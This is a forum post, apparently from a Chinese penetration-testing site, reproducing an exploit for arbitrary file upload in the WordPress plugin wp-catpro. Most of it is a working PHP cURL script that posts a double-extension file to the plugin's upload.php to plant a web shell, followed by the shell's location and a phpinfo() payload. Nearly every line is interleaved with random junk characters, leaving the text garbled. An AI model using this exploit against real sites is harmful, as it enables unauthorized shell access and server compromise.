中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
3 t0 N. i) s8 F- Z% d# m: {#-----------------------------------------------------------------------
! q" y9 N4 E  w9 g / ~; H/ j: U7 J( _6 F$ E1 X
作者  => Zikou-166 w, h1 p7 w* _7 [! \
邮箱 => zikou16x@gmail.com
% q# d9 X% z* j& Y# B  V* E' E测试系统 : Windows 7 , Backtrack 5r36 \4 h* z$ Z/ w; c: A& p
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
! _% q$ G5 z9 v; w+ @1 Y. U: g/ ^####- K. Q. M3 H/ g% r
  c- V  z8 [7 B+ s. ]/ Y' f
#=> Exploit 信息:, m) S9 n  u; J1 B$ V4 Q
------------------
! F# r$ o, T4 S& S8 _( a# 攻击者可以上传 file/shell.php.gif4 Q/ `* J' G, F/ V6 l, ^
# ("jpg", "gif", "png")  // Allowed file extensions
" f. o9 H3 s/ h: y1 A8 g# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)' C' y6 a; |9 \" F1 u+ E( ^$ j3 e
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
$ E* ~! h& ~& o: V, d------------------
- K0 G$ ?; j- K6 _ % U- Q$ m  m9 p
#=> Exploit, L0 }2 `2 u# j% j, }$ [+ O
-----------' W+ z( N1 O1 _5 S: a# F7 ]
<?php" H0 a( c! H3 V8 J, {( H
- c' J& g& p8 r% M
$uploadfile="zik.php.gif";
5 z' ~3 a* @) T$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
1 L4 c- T6 i: z" S  V: H  ocurl_setopt($ch, CURLOPT_POST, true);7 h  @& E; i' P$ p
curl_setopt($ch, CURLOPT_POSTFIELDS,  M! ^$ b2 R9 r. f
array('Filedata'=>"@$uploadfile",
  Q; s4 P3 d- Z'folder'=>'/wp-content/uploads/catpro/'));
  N- U& c/ E2 I5 G2 icurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);; ]' z$ s/ F- ]7 B/ }0 c
$postResult = curl_exec($ch);
- M/ i: @" {( }: ~, qcurl_close($ch);
- l9 M. f+ T! z* U, z
1 b$ H# a3 m, D! |print "$postResult";
$ }0 Q: z1 `) {2 l ) e- U' Z- d  n% v
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
2 z  P: h, B4 N/ K  j! P6 k, k  ?>+ M* r+ U  e3 U' g
<?php
7 n# n% e" A! xphpinfo();" G+ p5 m/ i( ^) ]+ Z2 c+ d0 W
?>




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2